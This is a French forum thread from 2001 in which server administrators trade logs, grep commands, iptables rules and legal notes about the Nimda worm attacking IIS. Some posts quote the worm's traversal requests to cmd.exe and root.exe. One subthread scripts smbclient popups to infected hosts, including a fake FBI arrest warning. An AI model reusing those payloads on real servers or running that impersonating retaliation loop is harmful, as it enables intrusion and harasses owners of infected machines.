Depuis 15h20 (donc ~9h20 heure de NYC, cad pile-poil une semaine apres l'attentat), j'enregistre beaucoup d'attaques sur mes machines, plusieurs trous connus de IIS 4 et 5: Bug Unicode, Printer.ISAPI, FrontPage, etc.
La nouveauté par rapport a Code Red I & II: ce vers se propage aussi par email (via un README.EXE) et en faisant télécharger ce README.EXE a partir de code javascript inséré sur les pages web des machines infectées.
Bref, beaucoup plus méchant à terme que les vers connus jusqu'à présent...
Note du modérateur : Slashdot semble confirmer
# Réponse automatique...
Posté par Jerome Demeyer . Évalué à 6.
Est ce que quelqu'un à un script de réponse automatique aux attaques de ce type ?
Si non, on peux en faire un, mais je n'arrive pas à avoir la commande whois pour obtenir automatiquement le proprio et le nom de l'admin d'un bloc IP...
[^] # Re: Réponse automatique...
Posté par PLuG . Évalué à 10.
Cela soulève encore la question: un ISP est il responsable de ce que font ses clients sur Internet ? [comme heberger des vers].
[^] # Re: Réponse automatique...
Posté par Jerome Demeyer . Évalué à 2.
les FAI ont d'autres plages d'adresses...
--
tail -f access-log | grep system32 | grep ^195.101 | while read ip ; do prevent_admin.ksh $ip ; done
[^] # Re: Réponse automatique...
Posté par gle . Évalué à 10.
http://www.ipindex.net(...)
Par exemple, pour les 195.101.*:
http://www.ipindex.net/c/195/195_101.html(...)
[^] # Re: Réponse automatique...
Posté par Brice Favre (site web personnel) . Évalué à 1.
Est ce que la poste est responsable de ce qu'envoie ses clients?
[^] # La minute du relou ...
Posté par Dugland Bob . Évalué à 8.
modifiée par la loi n°2000-719 (du 1/8/2000) :
Les personnes physiques ou morales qui assurent, à titre gratuit ou onéreux, le stockage direct et permanent pour mise à disposition du public de signaux, d'écrits, d'images, de sons ou de messages de toute nature accessibles par ces services, ne sont pénalement ou civilement responsables du fait du contennu de ces services que :
si, ayant été saisies par une autorité judiciaire, elles n'ont pas agi promptement pour empêcher l'accès à ce contenu.
Le texte de loi original ne contient pas de fautes de frappe.
Il faut vérifier la jurisprudence.
[^] # Re: La minute du relou ...
Posté par Brice Favre (site web personnel) . Évalué à 1.
[^] # [OT]Re: La minute du relou ...
Posté par Dugland Bob . Évalué à 1.
ISPs :
43-7 (la loi d'au dessus) :
Les personnes physiques ou morales dont l'activité est d'offrir un accès à des services de communication en ligne autre que de correspondance privée sont tenues, d'une part, d'informer leurs abonnés de l'existance de moyens techniques permettant de restreindre l'accès à certains services ou de les sélectionner, d'autre part, de leur proposer au moins un des ces moyens
Pendant que j'y suis je donne le reste
concernant la vie privée, elle est suicidée aux articles 43-9 :
43-9
Les prestataires mentionnés aux articles 43-7 (N.D.moi : les ISP) et 43-8 (N.D.moi : les éditeurs) sont tenus de détenir et de conserver les données de nature à permettre l'identification de toute personne ayant contribué à la création d'un contenu des services dont ils sont prestataires.
Ils sont également tenus de fournir aux personnes qui éditent un service de communication en ligne autre que de correspondance privée des moyens techniques de satisfaire aux conditions d'identification prévues à l'article 43-10
Les autorités judiciaires peuvent requérir communication auprès des prestataires mentionnés aux articles 43-7 et 43-8 des données mentionnées au premier alinéa. Les dispositions des articles 226-17, 226-21 et 226-22 du code pénal sont applicables au traitement de ces données.
Un décret du Conseil d'Etat, pris après consultation de la Commision nationale de l'informatique et des libertés, définit les données mentionnées au premier alinéa et détermine la durée et les modalités de leur conservation.
Qqun a le décret sous la main ?
43-10 (le meilleur)
I. Les personnes dont l'activité est d'éditer un service de communication en ligne autre que de correspondance privée tiennent à disposition du public :
- s'il s'agit de personnes physique, leur nom, prénom et domicile ;
- s'il s'agit de personnes morales, leur dénomnation ou leur raison sociale et leur siège social ;
- le nom du directeur de la publcation et, le cas échéant, celui du responsable de la rédaction au sens de l'article 93-2 de la loi n°82-652 du 29/7/1982 sur la communication audiovisuelle ;
- le nom, la dénomination ou la raison sociale et l'adresse du prestataire mentionné à l'article 43-8.
II. Les personnes éditant à titre non professionnel un service de communication en ligne autre (N.D.moi : ??? il manque le "que" dans mon texte) de correspondance privée peuvent ne tenir à disposition du public, pour préserver leur anonymat, que le nom, la dénomination ou la raison sociale et l'adresse du prestataire mentionné à l'article 43-8, sous réserve de lui avoir communiqué les éléments d'identification personnelle prévus au I.
Confiez vos données aux gentils commerciaux ...
résumé du 93-2 :
Il existe obligatoirement un "directeur de la publication"
Il ne jouis pas de l'immunité parlementaire (sinon, il nomme un co-directeur)
Il est majeur, et jouit des ses droit civils et civiques
Il est le PDG, président du directoire, gérant ou représentant légal suivant le cas
[^] # Re: [OT]Re: La minute du relou ...
Posté par Dugland Bob . Évalué à -1.
y'a un modéro pour mettre ça en -1 ?
désolé
[^] # Re: La minute du relou ...
Posté par Jerome Demeyer . Évalué à 1.
Avez vous déjà signé un contrat d'hébergement qui contiennent des clauses de sécurité ?
[^] # Re: Réponse automatique...
Posté par Gilles Cuesta . Évalué à 1.
http://www.gnobalt.net/nimda_detect.sh(...)
A+
# /.
Posté par Yann Kerhervé (site web personnel) . Évalué à -10.
# Fait chier
Posté par Tutur . Évalué à -7.
[^] # Re: Fait chier
Posté par un nain_connu . Évalué à 10.
[^] # OOOPS kernel panic
Posté par un nain_connu . Évalué à -3.
[^] # Re: OOOPS kernel panic
Posté par Obsidian . Évalué à -2.
[^] # Re: Fait chier
Posté par Anonyme . Évalué à 10.
Il s'installe à la manière de Code Red dans le système, nettoie toute infection préalable de Code Red (et Code Red 2 il me semble), et se propage comme tout ver qui se respecte pour faire le ménage ailleurs.
Pour le virus qui nous intéresse, il ne s'agit pas d'un Code Red 3, il semblerait que ce soit un virus à propagation mailesque qui nécessite de la part de l'utilisateur l'exécution de l'attachement (comme SIRCAM) et qui, semble-t-il, lance un scan à-la script-kiddie sur plusieurs vieilles vulnérabilités IIS (root.exe, etc.)
Après le passage de Code Red, il ne doit plus rester beaucoup de serveurs IIS vulnérables à ça.
AMHA, le plus gros risque est une "baisse" de bande passante pour le pov'gars qui est "infecté" (celui qui lance les attaques) et pour ceux qui sont visés par les attaques (en fait, y a pas de baisse, puisqu'elle est utilisée...)
Pour finir, son nom (une fois de plus ; il est marqué partout sur cette page) : W32.Nimda.
PS: Ca change de Code Blue, le pseudo Code Red 3... au moins, celui-là, il existe, je l'ai rencontré (5432 hits depuis 128 serveurs)
[^] # Re: Fait chier
Posté par Anonyme . Évalué à 10.
http://news.zdnet.co.uk/story/0,,t269-s2095530,00.html(...)
En résumé (pour les fainéants ou les anglophobes) :
- Il se propage par une vieille d'iis (un vieux truc, cherchez "sadmind/iis worm", vous verrez)
- Au lieu de mettre une page "hacked by chinese", il ajoute du javascript vicieux qui fait envoyer exécuter le virus à votre carnet d'adresse par le biais d'Internet Explorer (via une "feature", comme d'hab)
- Il y aurait même une probable (future) contamination par IRC.
- Il semblerait qu'il télécharge des trucs par FTP, mais ils savent pas encore quoi.
'tain, le gars qui l'a pondu y a intégré tout ce qu'il pouvait :)
[^] # Juste une autre URL de description du vers :
Posté par Brunus . Évalué à 3.
dans les dommages: "open C drive as network share"...
http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html(...)
[^] # Re: Fait chier
Posté par un nain_connu . Évalué à 5.
[^] # Re: Fait chier
Posté par Anonyme . Évalué à 4.
Pas la peine de faire ton pénible, va !
[^] # Re: Fait chier
Posté par Pascal Terjan (site web personnel) . Évalué à 1.
# Detection d'attaques de vers.
Posté par Yves Dessertine . Évalué à 6.
[^] # Re: Detection d'attaques de vers.
Posté par gabuzo . Évalué à 10.
grep -F 'c+dir' /var/log/httpd/access_log
Et je trouve 951 lignes depuis 15h37 aujourd'hui contenant des trucs comme :
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
Après il est assez difficile de réagir. J'avais trouvé quelque part un script qui à partir des logs d'apache ajoutait des règles de filtrage des paquets IP pour interdire ceux en provenance des machines d'où provenaient les attaques. Je suis assez peu sûr de l'efficacité du truc car je ne pense pas qu'une machine infectée revienne souvent scanner la même IP.
[^] # Re: Detection d'attaques de vers.
Posté par PLuG . Évalué à 3.
[^] # Re: Detection d'attaques de vers (version PHP)
Posté par Wi][ish . Évalué à 3.
echo "CODE RED 3 : ";
system("grep -F 'c+dir' /var/log/httpd/access_log | wc -l");
echo "attaques !";
?>
[^] # Re: Detection d'attaques de vers.
Posté par Benoît Sibaud (site web personnel) . Évalué à 2.
[^] # Re: Detection d'attaques de vers.
Posté par Anonyme . Évalué à 1.
[^] # Re: Detection d'attaques de vers.
Posté par Jean . Évalué à 1.
[^] # Re: Detection d'attaques de vers.
Posté par Benoît Sibaud (site web personnel) . Évalué à 0.
Exemples:
X.X.X.X - - [17/Sep/2001:08:06:02 +0200] "GET /cgi-bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 264
X.X.X.X - - [17/Sep/2001:08:06:02 +0200] "GET /..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 256
X.X.X.X - - [17/Sep/2001:08:06:02 +0200] "GET /..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 400 227
X.X.X.X - - [17/Sep/2001:08:06:03 +0200] "GET /..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 400 227
[^] # Re: Detection d'attaques de vers.
Posté par PLuG . Évalué à 10.
netcat c'est un petit utilitaire TRES sympa !!
[d'ailleurs je vais de ce pas relire son man]
[^] # Re: Detection d'attaques de vers.
Posté par Obsidian . Évalué à 0.
Ou peut-on le trouver ?
Merci d'avance.
[^] # Re: Detection d'attaques de vers.
Posté par PLuG . Évalué à 10.
Si cela se trouve tu as déjà ce petit bijou, son binaire est /usr/bin/nc sur la redhat.
pour ecouter sur le port 80 en TCP, la commande est:
nc -l -p 80
par contre il va envoyer les requetes sur stdout et se terminer des la première requete ...
un truc du genre:
while :
do
nc -l -p 80
done > /var/log/port80.log
devrait faire ce que tu veux
tu peux meme ajouter une réponse basique en entrée standard de nc pour faire croire à un vrai serveur web, genre
nc -l -p 80 < maréponsetoutefaite.html
ce nc est un outils INCONTOURNABLE. en bref: TCP ou UDP, listen ou connect, il permet de faire des petits serveurs en shell, de forwarder des connexions d'une machine vers une autre ...
[^] # Re: Detection d'attaques de vers.
Posté par kadreg . Évalué à 1.
ftp://ftp.ptb.de/pub/network/tools/netcat-1.10.tar.gz(...)
je ne l'ai pas trouvé sur le site officiel pointé par freshmeat (a part la version windows :o) )
pour le compiler, faire un make linux
Mais pour qu'il compile, j'ai mis en commentaire la ligne
res_init () dans netcat.c
[^] # Re: Detection d'attaques de vers.
Posté par Gaël Le Mignot . Évalué à 5.
Il existe un patch pour Netfilter (firewall du kernel 2.4.x) qui permet de matcher des chaines de caractères dans les paquets.
Un simple
iptables -A INPUT -p tcp --dport 80 -m string --string "default.ida" -j LOG
devrait suffir, pas besoin de démon...
Pour installer la pacth: télécharger le code source d'iptables et lance make patch-o-matic
[^] # Re: Detection d'attaques de vers.
Posté par Anonyme . Évalué à -1.
[^] # Re: Detection d'attaques de vers.
Posté par Jerome Demeyer . Évalué à 2.
iptables -A INPUT -p tcp --dport 80 -m string --string "system32" -j LOG
moi chuis en 2.2, mais des trucs comme ça ca te donne envie de passer en 2.4 !
[^] # Re: Detection d'attaques de vers.
Posté par Ludovic Boisseau . Évalué à 2.
Autre chose : comment ça se passe exactement ? Bah oui, disons que le paquet est au départ accepté (port 80 vers un serveur web), puis il est jeté si il contient default.ida ???? Moralité : ce genre de paquets "matche" deux fois une règle.... pfff !!!
Je ne suis pas prêt d'utiliser cette saloperie, à moins d'avoir un firewall très costaud !!!
[^] # Re: Detection d'attaques de vers.
Posté par Anonyme . Évalué à 2.
Pour commencer, tout ne se passe pas en 1 paquet. Avant que n'arrive la requete HTTP, il y a 3 paquets qui transitent pour établir la connexion. C'est le premier de ceux là (le SYN) qui est filtré par la première règle. Pour les 2 autres (SYN+ACK, ACK), je sais pas s'il les filtre.
En tout cas, étant donné que c'est du statefull (depuis la 2.4, ça tombe bien, on parle d'iptables), une fois le SYN autorisé et la connexion établie, il met à jour sa table de connexions.
Ensuite, quand vient le paquet avec la requete HTTP, il sait que la connexion est établie (d'après sa table), et il regarde le deuxième filtre (celui du contenu).
Quelqu'un qui connait iptables à fond peut confirmer ?
[^] # Re: Detection d'attaques de vers.
Posté par PLuG . Évalué à 3.
ensuite parlons des problèmes iptables:
1/ comme c'est dit au dessus, inspecter le contenu des paquets est très lourd, peut etre même trop lourd en mode kernel.
2/ il y a deux types de machines: celles qui n'ecoutent pas sur le port 80 (et ne recevront jamais la requete) et celles qui écoutent sur le port 80 (elles ont donc un process bien mieux qualifié que iptables pour filtrer les url).
3/ que se passe t'il en cas de paquets fragmentés au milieu d'une url ? ta règle impose t'elle à iptable de ré-assembler les paquets ?? si NON, elle est completement inéficace. si OUI, elle est encore plus couteuse.
Sinon, pour la théorie iptables, effectivement on peut limiter le nombre de règles à parcourir pour prendre la décision. c'est d'ailleur une TRES bonne pratique.
a/ mettre en premier les règles qui ont le plus de chances d'être acceptées directement. par exemple -state established,related, le plu sgrand nombre de paquets n'etant pas des demandes de connection.
b/ séparer les règles en sous groupes. Dans le cas présent, une première règle qui dirige les requetes sur le port 80 vers une chaine "WEB" avant la "-state established,related" permettra d'éviter de scanner les règles dédiées au WEB pour les paquets FTP ...
bref, iptables c'est comme le reste, on peut toujours améliorer les règles.
[^] # Re: Detection d'attaques de vers.
Posté par Gaël Le Mignot . Évalué à 2.
En gros, dans ta chaine INPUT tu valides les demandes de connexions sur les ports ouverts, et tu envoies les paquets se trouvant dans une connexion deja etablie dans une autre chaine qui filtre.
Ca donne:
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -m state --state ESTABLISHED -j FILTER
y'a plus qu'a definir tes regles dans FILTER.
Ce n'est qu'une solution parmis d'autres... iptables est tres puissant et tres configurable :)
[^] # Re: Detection d'attaques de vers.
Posté par Anonyme . Évalué à 1.
Il faut vraiment que je me penche là dessus...
Quoi qu'il en soit, pour que le firewall soit rapide , il faut que les filtres sur les hautes couches OSI soient faites APRES le filtrage des couches basses, c'est la base...
Sinon, quelqu'un a une (bonne) URL pour "apprendre" Netfilter ?
[^] # Re: Detection d'attaques de vers.
Posté par Frédéric Massot (site web personnel) . Évalué à 2.
(Plusieurs remarques en vrac)
Je ne pense pas que le probleme vienne de la charge supportee part le firewall, les machines d'aujourd'hui sont quand meme assez puissante.
On ne mets pas un 486 en firewall pour le type de LAN que je decris.
Pour repondre a une remarque sur la fragmentation, lorsque le suivi de connexion est active iptable re-assemble les fragments.
Certains firewall Cisco font de l'inspection dans la couche 7.
Pour moi le probleme de ce type de regle (dans le cas d'un DROP des paquets contenant "system32") est dans certain cas d'accentuer le DDOS :
Lorsque Apache recoit le sync, il attribue un processus pour gerer cette connexion.
Ce processus echange deux autres paquets avec le client pour initier la connexion, et sur le quatrieme paquet, iptable drop les paquets suivants, et vire la connexion de sa table de suivi de connexion.
Pendant ce temps la, Apache attends les paquets jusqu'au timeout (de quelques minutes).
Imagine que pendant ces quelques minutes le serveur web recoive plusieurs paquets sync d'autres hotes verole, en moins d'une minute tu peux epuiser le nombre de processus autorise par Apache, et ne plus accepter aucunes requetes, meme de clients non veroles.
Si tu ne bloques pas ce quatrieme paquet avec iptable, le processus (Apache) qui gere la requete mets normalement fin a la connexion, et est prets a en gerer une nouvelle.
[^] # Re: Detection d'attaques de vers.
Posté par Frédéric Massot (site web personnel) . Évalué à 1.
iptables -I INPUT -i eth0 -p tcp --tcp-flags ACK ACK --dport 80 -m string --string '/system32' -j REJECT --reject-with tcp-reset
Ca clos proprement la connexion sur le firewall, et sur l'hote verole, mais le serveur web reste en attente jusqu'au timeout. :-(
Les developpeurs d'iptable penseront peut etre a ajouter une option pour modifier le paquet recu de l'hote verole.
C'est a dire transformer le paquet en une demande de cloture de connexion.
Le serveur web, le firewall, et le client verraient ainsi leurs sessions close proprement. ;-)
[^] # Re: Detection d'attaques de vers.
Posté par PLuG . Évalué à 3.
Pourquoi ?
Parce que pour se connecter, le serveur distant va envoyer une demande de connection (SYN+ACK), petit paquet SANS DONNEES auquel ta machine ne va pas répondre puisque aucun serveur n'écoute sur le port. La requete HTML se trouve dans les paquets suivants, envoyés par le serveur SEULEMENT si ta machine a accepté la connexion.
Je le sais bien, j'ai une astuce de ce genre sur mon firewall qui me loggue au format libpcap les paquets qu'il n'aime pas (cf http://freshmeat.net/projects/pdumpq/(...)
)... mais je ne récupère que des demandes de connexion :-(
# Exploitation du vers...
Posté par Jerome Demeyer . Évalué à 10.
195.101.xxx.xxx - - [18/Sep/2001:18:11:16 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 284
195.101.xxx.xxx - - [18/Sep/2001:18:11:16 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 282
195.101.xxx.xxx - - [18/Sep/2001:18:11:17 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 292
...
195.101.xxx.xxx - - [18/Sep/2001:18:12:23 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 306
Alors contre ca :
1 - récupération du nom de la société :
www.ripe.net/perl/whois?query=-L+195.101.xxx.xxx
2 - la société s'appelle FR-XXXX :
www.ripe.net/perl/whois?query=FR-XXXX&.submit=Soumettre+la+requ%EAte
on obtient le nom du contact...
3 - réponse :
$ nmblookup -A 195.101.xxx.xxx
DOMAIN <20>
USER <03>
$ smbclient -n Response -U Securite -I 195.101.xxx.xxx -M USER
alors $USER ? on essaye de m'attaquer ?
je sais que tu bosses chez $address, et si tu continues je vais prévenir $person ($phone)
^D
4 - bien rire à l'idée que le mec recoit un popup sur sa bécane... pauvre script kiddy en panique !
[^] # Re: Exploitation du vers...
Posté par PLuG . Évalué à 9.
ca me fait penser au jour ou un type scannait mon firewall alors que j'etais la.
je lui ai envoyé un mail venant de root@samachine et lui demandant d'arreter ses conneries [il avait laissé le port 25 ouvert et sendmail mal configuré] ... j'imagine sa tronche en lisant le mail :-))
[^] # Re: Exploitation du vers...
Posté par Jerome Demeyer . Évalué à 7.
Moi j'adore prendre ces petites têtes à leurs propre jeu...
On peut aussi changer le message :
" ----- FBI WARNING -----
You, $USER, are trying to hack one of our servers. In consequencies of the DAC99 we decided to arrest you. We know you actually are in the society "$address1" on the workstation "$PC<20>".
We have already contacted Mr $person. Please do not move while the French Gendarmerie is comming.
Thank you for your cooperation.
Agent Smith."
[^] # Re: Exploitation du vers...
Posté par Anonyme . Évalué à 0.
[^] # Re: Exploitation du vers...
Posté par Anonyme . Évalué à 4.
[^] # hihi j'osais pas le dire
Posté par Anonyme . Évalué à -1.
[^] # Re: Exploitation du vers...
Posté par Anonyme . Évalué à 2.
[^] # Re: Exploitation du vers...
Posté par gabuzo . Évalué à 10.
Cependant c'est peut être une technique à creuser pour prévenir les admin des machines infectées.
[^] # Re: Exploitation du vers...
Posté par Jerome Demeyer . Évalué à -2.
les FAI ont d'autres plages d'adresses pour leurs abonnés.
[^] # Re: Exploitation du vers...
Posté par I P . Évalué à 8.
for i in ` grep -F 'c+dir' access.log | cut -d " " -f 1 | uniq`; do USER=`nmblookup -A $i | grep 03 | cut -d " " -f 1`; smbclient -n Response -U Security -I $i -M $USER < message; done
Placez dans le fichier "message" le texte à envoyer et lancez le tout.
Bon ca demande a être paufiné mais ca marche.
[^] # Re: Exploitation du vers...
Posté par I P . Évalué à 5.
Ca marche mieux comme ca, sinon il y avait un probleme si plusieurs utilisateurs étaient connectés sur la machine cible
[^] # Re: Exploitation du vers...
Posté par Jerome Demeyer . Évalué à -1.
me parlez pas de citrix, pas sur un serveur web public
[^] # update: Exploitation du vers...
Posté par Jerome Demeyer . Évalué à 0.
Mais puisqu'il s'agît bel et bien d'un vers, mieux vaut envoyer un mail qu'un popup au contact technique trouvé sur le whois des sites vérolés.
les points 1 et 2 restent valables pour obtenir les coordonnées des contacts.
Faites en quelques uns par jour, histoire de contribuer à l'éradication de ces saletés...(oui je sais : "yzavaikacmetsousnunux", mais on est pas des chiens ?)
[^] # Les Jean-Kevin sont agressifs
Posté par Brice Favre (site web personnel) . Évalué à 1.
Moi j'ai pas bien rit l'autre jour. J'ai pas compris, un gars m'envoie un message via ICQ en m'insultant et en m'accusant de l'avoir pirater. Il me dit "vient pirater mon adresse e-mail si tu l'oses petit connard".
J'étais bien tenté de me connecter sur un serveur mail pour lui faire un peu peur, mais finalement je suis passé à autre chose.
[^] # Re: Exploitation du vers...
Posté par Anonyme . Évalué à -1.
De toute façons il est urgent de trouver et d'appliquer un bon "nettoyant" !
# virus .exe
Posté par Anonyme . Évalué à 2.
Si c'est le cas.. on appelle ça la sélection naturelle.
Vous êtes le maillon faible: au revoir!
# Confirmation
Posté par François Désarménien . Évalué à 3.
Je l'ai reçu trois fois cet après-midi, le premier datant de 15H30 CET, et un 'strings' permet même d'y trouver la chaine << Concept Virus(CV) V.5, Copyright(C)2001 R.P.China >> !
De plus, il y a énormément de traffic sur la liste Snort User à son sujet depuis environs 15H00 CET sur les moyens de le bloquer.
[^] # Re: Confirmation
Posté par David Bober (site web personnel) . Évalué à 2.
d'autant que j'ai un 404 dynamique sur lequel j'ai un compteur.
La seul solution que j'ai trouvé c'est de rediriger mes visiteurs sur le port 81,
mais chez quelques rares personnes ça ne passe pas (firewall) :(
Je presice que j'ai fait le serveur avec quelqun d'autre (c'est un script) et que je doit peut etre le seul au monde a l'utiliser de cette façon...
ça fausse tout ces code-red et autres :(
[moua]
[^] # Re: Confirmation
Posté par Lol Zimmerli (site web personnel, Mastodon) . Évalué à 8.
La gelée de coings est une chose à ne pas avaler de travers.
[^] # Re: Confirmation
Posté par David Bober (site web personnel) . Évalué à 0.
enfin bon... vais modifier le comportement de mon serveur sur certaines requetes (comme ça j'aurrais les stats normal + les stats pour les vers :) )
[moua]
[^] # Re: Confirmation
Posté par Philippe Sarazin . Évalué à 1.
J'ai pas encore reçu le mail, mais à la maison, sur la ligne ADSL wanadoo, les logs me donnent 1 tentative de connexion sur un serveur HTTP par minute en moyenne entre 13h et 20h30 !!!!
Ca s'etait un peu calmé depuis après CodeRed, c'est reparti de plus belle...... c'est lourd quand même.....
# Qu'eb est il maintenant de IIS ?
Posté par Anonyme . Évalué à 3.
PS : il est vrai qu'en entreprise on ne peut pas installer n'importe quoi !
Dans ma nouvelle Entreprise ils sont tous sur Win 2000 server et ils ont un serveur HP-UX pour les données importantes.
Installer Linux ou autre c'est hors de question, faut demander a la maison mere qui elle fait confiance à DELL !
N'empeche, qu'on me dise pas qu'il est impossible d'installer Mozilla, Netscape ou un logiciel gratos ! (je fais allusions aux 45% de MSIE sur Linuxfr)
L'admin est OK si :
- L'installe foire pas le systeme
- Si la license est OK (par exemple, pas de copie illicite !)
- Si les pb seront, pour le logiciel, de notre responsabilité !
Franchement il n'y a qu'a l'ecole ou il est interdit d'installer quoique ce soit sur notre poste !
[^] # Re: Qu'en est il maintenant de IIS ?
Posté par Obsidian . Évalué à 10.
En effet , "comment une entreprise multinationale comme Microsoft pourrait-elle ignorer cet état de fait et laisser de tels trous de sécurité dans un serveur professionnel de l'envergure d'IIS", pourrait-on entendre !
Ne serait-ce qu'à la maison, je passe pour un raseur quand je relate les différentes faiblesses de l'OS de Redmond, et je me fait engueuler lorsque cela plante effectivement, parce qu'alors personne veut croire que cela puisse être possible ("Ca a toujours marché ! Y a pas de raison").
En réponse, il suffit que Microsoft fasse fonctionner 1% de sa FUD-Machine pour que la désinformation soit totale, et que pour un peu, ce soit les partisans du libre qui portent le chapeau.
Sans aller jusque là, je pense que très peu de gens feront la relation entre les serveurs et le virus. Si les gens sont habitués à rebooter leur machine 4 fois par jour, alors je suppose que les virii font partie aussi de leur quotidien, qu'ils pensent que c'est comme çà et qu'il faut vivre avec.
Les solutions efficaces, à mon avis, ce sont les campagnes de sensibilisation et les journées du libre, ainsi que les démonstrations des LUGs, comme celle de Chamarande ce week-end pour ceux qui y étaient. Rien de tel que le contact direct pour:
1) Expliquer que l'objet du mouvement est de créer un système propre, et non de faire tourner un marché.
2) Que c'est gratuit, et sans engagement.
3) Que non, il n'y a pas de piège.
Si les gens se laissent séduire, ben petit à petit on établira un standard de fait, exactement comme pour Windows. Les décideurs s'y mettront à leur tour, puisque ce sera répandu et sans surprise (le projet ne sera pas abandonné du jour au lendemain), et là, on fera de la vraie information.
Et si cela se produit, il y a neuf chances sur dix pour que le commun des utilisateurs ne remarque même pas la transition (un peu comme la modification de l'histoire à la volée de l'incontournable 1984, qui décidément fait beaucoup parler de lui en ce 21ème siècle).
Amitiés.
[^] # Re: Qu'en est il maintenant de IIS ?
Posté par Anonyme . Évalué à 1.
Je ne sais pas si tu mets les formes ( il y a bien qq1 qui a décidé de mettre du iis ) lorsque tu relates les "faiblesses", si oui, les gens qui t'engueulent te prennent pour un con et ne sont pas ouverts.
Un conseil: mauvaise boite, changer boite.
[^] # Re: Qu'en est il maintenant de IIS ?
Posté par Obsidian . Évalué à 0.
(Même s'il m'est arrivé de me faire pratiquement séquestrer dans un bureau dont l'ordinateur avait une panne (provoquée en fait par un serveur DHCP défaillant)).
En général, ça passe quand je menace de laisser les personnes concernées se débrouiller seules ...
Sinon, j'ai suivi ton conseil: J'ai largué ma (mauvaise) boite ! :-)
Amitiés.
# plus gênant que Code Red
Posté par Sebastien (site web personnel) . Évalué à 6.
grmbl ...
seb.
[^] # Re: plus gênant que Code Red
Posté par Benoît Sibaud (site web personnel) . Évalué à 3.
# c'est aussi confirmé par cert.org
Posté par Anonyme . Évalué à 4.
pour le readme.exe il est associé à une pièce jointe html qui l'execute automatiquement à travers une iframe
# Assez bizarrement...
Posté par Anonyme . Évalué à 2.
195.1.135.186 - - [01/Sep/2001:11:47:05 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 302 - "-" "-"
Ensuite, effectivement, ça a commencé aujourd'hui à 15h32 pour moi, et j'en suis à plus de 4000 hits générés.
Par ailleurs, à part que c'est gros consomateur de bande passante et de ressource à côté de Code Red, quelqu'un a vu quelque part si c'est l'exploit d'une vulnérabilité répandue ? (ça ne m'en a pas du tout l'air...)
En clair, si j'ai bien tout compris, c'est un virus à la SIRCAM (il faut que l'utilisateur le lance avec son mailer) qui lance un scan IP/Vulnérabilité(?) IIS. Par conséquent, il n'est pas aussi dangereux que Code Red en terme d'infection. Par contre, en terme de "ça m'emmerde", c'est une autre affaire.
J'ai bon ?
[^] # Re: Assez bizarrement...
Posté par Anonyme . Évalué à 4.
[^] # Re: Assez bizarrement... attention -1
Posté par Moule Atarte (site web personnel) . Évalué à -1.
[^] # Re: Assez bizarrement...
Posté par Gauthier (Mastodon) . Évalué à 0.
Serveur 1 : 264 IP distincts pour 3839 attaques
Serveur 2 : 145 IP distincts pour 2259 attaques
Serveur 3 : 364 IP distincts pour 6445 attaques
Et ca vient du monde entier ;-)
...
abn165-240.ank-ports.kablonet.net.tr
adsl-156-12-152.asm.bellsouth.net
analysis9.analysis.gr
camelot.lfhk.cuni.cz
class1.pisoft.it
courseware.org.uk
...
Pratique la résolution dns sur le serveur web
[^] # Re: Assez bizarrement...
Posté par cornofulgur . Évalué à 2.
[^] # Re: Assez bizarrement...
Posté par Gloo . Évalué à 2.
l'article s'appele "How to Manually Uninstall and Reinstall Outlook Express in Windows 2000"
Evidemment, tu peux t'arreter à Uninstall, tout ça à tes risques et perils. dis nous au final si cela a fonctionné.
# Nouveau Vers: Code Red le retour
Posté par Anonyme . Évalué à 0.
# Son nom
Posté par C2RIK . Évalué à 4.
Source Norton : http://www.norton.com(...)
Cet enfoiré effectue 14 requêtes à chaque fois !!!
# hé oui
Posté par Anonyme . Évalué à 2.
jice - pas le courage de me loguer
# Mes logs vont exploser ;-)
Posté par Foxy (site web personnel) . Évalué à 2.
Visiblement, ce ver scanne les serveurs du sous-réseau auquel il appartient puisque toutes les requêtes viennent du même hébergeur que moi (enfin les premières..).
J'ai subi mes premières attaques à 15h59:59 précises (bizarre ou non, je ne sais pas). Est-ce que quelqu'un a plus de détails ?
[^] # Re: Mes logs vont exploser ;-)
Posté par Lol Zimmerli (site web personnel, Mastodon) . Évalué à 0.
La gelée de coings est une chose à ne pas avaler de travers.
[^] # Re: Mes logs vont exploser ;-)
Posté par Le_Maudit Aime . Évalué à -1.
It is a feature, not a bug ???
Comme quoi winblows est gourmand en espace disque même sur les autres OS... (c;
[^] # Re: Mes logs vont exploser ;-)
Posté par Gaël Le Mignot . Évalué à -1.
Le temps que je rentre chez moi pour réparer ça et j'ai éviter le pire je crois. Uniquement 30 attaques :(
Par contre j'en suis à plus de 1400 pour CodeRed... (les stats sur http://drizzt.dyndns.org/codered.php(...)).
Bon, tout le monde s'en fout donc -1
[^] # Re: Mes logs vont exploser ;-)
Posté par Anonyme . Évalué à -1.
(première occurence : 19/Jul/2001 17:47:17
dernière occurence : 20/Aug/2001 00:01:41)
Code Red 2 : 1813 hits de la part de 782 serveurs
(première occurence : 04/Aug/2001 17:18:12
dernière occurence : 18/Sep/2001 23:16:48)
Nimda : 6189 hits de la part de 142 serveurs
(première occurence : 18/Sep/2001 15:32:44
dernière occurence : 18/Sep/2001 23:51:19)
Bon, c'était p'têt pas la peine de sortir tout ça, mais on y voit que :
Code Red 1 est mort et enterré
Code Red 2 continue à sévir
Nimda est beaucoup plus virulent que les deux réunis... (en quelques heures, presque autant d'IPs que Code Red 1 en 15 jours...)
Mais bon, tout le monde s'en fout -> -1
[^] # Re: Mes logs vont exploser ;-)
Posté par Tony Flow . Évalué à 2.
